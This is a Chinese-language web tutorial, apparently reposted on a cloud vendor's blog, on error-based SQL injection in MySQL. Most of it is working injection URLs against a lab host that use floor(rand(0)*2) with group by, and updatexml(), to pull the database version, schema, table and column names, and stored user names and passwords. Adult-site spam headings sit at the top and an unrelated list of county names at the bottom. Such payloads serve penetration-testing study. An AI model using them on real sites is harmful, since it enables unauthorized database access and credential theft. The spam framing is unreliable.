91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

大數據中的報錯注入是怎么樣的

發布時間:2021-12-10 09:22:55 來源:億速云 閱讀:136 作者:柒染 欄目:大數據

這篇文章將為大家詳細講解有關大數據中的報錯注入是怎么樣的,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

一、相關函數

1、rand():產生一個0-1之間隨機數,rand(0),隨機產生一個0-1的隨機數,運行多次產生的結果一樣

2、floor():向下取整,floor(rand()*2),隨機產生0和1兩個數

3、group by:分組排列

4、count(*):統計數量

大數據中的報錯注入是怎么樣的

5、concat():將字符串連接起來

二、通過floor()函數構造注入語句

1、訪問http://192.168.0.104/aiyou/bczr.php?id=2,返回正常頁面

大數據中的報錯注入是怎么樣的

2、訪問http://192.168.0.104/aiyou/bczr.php?id=2',返回錯誤頁面

大數據中的報錯注入是怎么樣的

3、構造閉合語句,192.168.0.104/aiyou/bczr.php?id=2' --+,頁面返回正常

4、獲取數據庫版本

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,(version()))x from information_schema.tables group by x )a) --+

大數據中的報錯注入是怎么樣的5、獲取數據庫名稱

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,database(),0x23)x from information_schema.tables group by x )a) --+

6、獲取其他數據庫名稱(修改紅色數字,獲取不同數據庫名)

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

7、獲取表名(修改紅色數字,獲取不同表名)

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

8、獲取字段名,需要指定表名,表名用十六進制表示,修改紅色數字獲取不同字段

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x75736572 LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

大數據中的報錯注入是怎么樣的

9、獲取字段內容

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,name,0x3a,pass,0x23) FROM user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

大數據中的報錯注入是怎么樣的

三、通過updatexml函數構造注入語句

1、獲取數據庫名稱(通過修改紅色數字獲取不同的數據庫名稱)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 5,1),1) -- +

2、獲取表名(通過修改紅色數字獲取不同的表名)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='jay' limit 1,1),1) -- +

3、獲取字段名(通過修改紅色數字獲取不同的字段)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x75736572 limit 1,1),1) -- +

4、獲取字段內容(修改紅色數字,獲取不同字段內容)

http://192.168.0.104/aiyou/bczr.php?id=2' and updatexml(1,(select concat(0x7e, pass,0x7e,name,0x7e) from user limit 1,1),1) -- +

大數據中的報錯注入是怎么樣的

關于大數據中的報錯注入是怎么樣的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

赤水市| 随州市| 文昌市| 黑河市| 红桥区| 溆浦县| 安阳县| 方城县| 平潭县| 万荣县| 泾源县| 深圳市| 壶关县| 横山县| 舞钢市| 溧水县| 城口县| 建瓯市| 雷山县| 乌拉特前旗| 库伦旗| 泸溪县| 阳原县| 广南县| 滦平县| 剑河县| 甘肃省| 安庆市| 和龙市| 儋州市| 新乡县| 南陵县| 临沧市| 邳州市| 江华| 祁连县| 桂东县| 托里县| 金堂县| 新龙县| 罗定市|